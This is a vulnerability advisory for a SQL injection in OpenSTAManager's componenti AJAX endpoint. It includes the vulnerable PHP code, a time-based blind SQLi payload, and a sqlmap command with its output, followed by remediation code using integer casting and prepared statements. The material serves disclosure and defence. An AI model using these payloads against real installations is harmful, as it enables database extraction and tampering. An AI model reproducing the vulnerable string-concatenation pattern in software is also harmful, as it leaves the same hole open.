CVE-2025-69214
Severity: HIGH 8.8 | EPSS 0.02%
OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)
Description
## Summary

A SQL Injection vulnerability exists in the `ajax_select.php` endpoint when handling the `componenti` operation. An authenticated attacker can inject malicious SQL code through the `options[matricola]` parameter.

## Proof of Concept

### Vulnerable Code

**File:** `modules/impianti/ajax/select.php:122-124`

```php
case 'componenti':
    // user-controlled value, taken from options[matricola]
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        // raw string concatenated into the IN() clause
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }
```

### Data Flow

1. **Source:** `$_GET['options']['matricola']` → `$superselect['matricola']`
2. **Vulnerable:** User input concatenated directly into the `IN()` clause without sanitization
3. **Sink:** Query executed via the AJAX framework

### Exploit

**Manual PoC (Time-based Blind SQLi):**

```http
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
```

![image](https://github.com/user-attachments/assets/238015dd-5644-4eed-ae8f-864dc0073011)

**SQLMap Exploitation:**

```bash
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3
```

**SQLMap Output:**

```
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
```

![image](https://github.com/user-attachments/assets/b0b7078b-09a7-4e53-956c-baf1d09ed59b)

## Impact

- **Data Exfiltration:** Time-based blind SQL Injection allows complete database extraction
- **Authentication Bypass:** Access to sensitive component and equipment data
- **Data Manipulation:** Potential unauthorized modification of records

## Remediation

Cast values to integers before using them in SQL:

**Before:**

```php
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}
```

**After:**

```php
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    // every comma-separated segment is forced to an integer before interpolation
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}
```

## Credit

Discovered by: Łukasz Rybak
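The following is an added illustration of the remediation, not code from the OpenSTAManager project. It goes a step beyond the advisory's `intval()` fix: segments that are not plain integers are rejected instead of silently cast, and the surviving ids are bound through placeholders so no user data is ever interpolated into the SQL text. Function names and the PDO usage are assumptions for the example.

```php
<?php
// Added example (not OpenSTAManager code): safe handling of options[matricola].
// Table and column names follow the advisory; the PDO connection is a placeholder.

/**
 * Normalise a comma-separated list of equipment ids from user input into an
 * array of integers. Anything that is not a pure digit string (including an
 * injected SQL tail such as "1) AND (SELECT ...") is discarded, whereas
 * intval() would quietly turn it into 1.
 */
function parseImpiantiIds(string $raw): array
{
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        $part = trim($part);
        if ($part !== '' && ctype_digit($part)) {
            $ids[] = (int) $part;
        }
    }
    return array_values(array_unique($ids));
}

/**
 * Build the WHERE fragment with one "?" placeholder per id, returning the
 * fragment and the parameter list to bind separately.
 */
function buildComponentiWhere(array $ids): array
{
    if ($ids === []) {
        // No valid ids: match nothing rather than silently dropping the filter.
        return ['0 = 1', []];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    return ['`my_componenti`.`id_impianto` IN ('.$placeholders.')', $ids];
}

// Constructed inputs: the advisory's payload shape, then a mixed benign list.
foreach (['1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1', '12, 7,abc,12'] as $raw) {
    [$sql, $params] = buildComponentiWhere(parseImpiantiIds($raw));
    echo $sql, ' ', json_encode($params), PHP_EOL;
}

// Intended use with a prepared statement (assumed $pdo instance):
// $stmt = $pdo->prepare('SELECT * FROM `my_componenti` WHERE '.$sql);
// $stmt->execute($params);
```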
Affected packages (1)
- Packagist: devcode-it/openstamanager, versions from 0, <= 2.9.8
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | HIGH 8.8 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |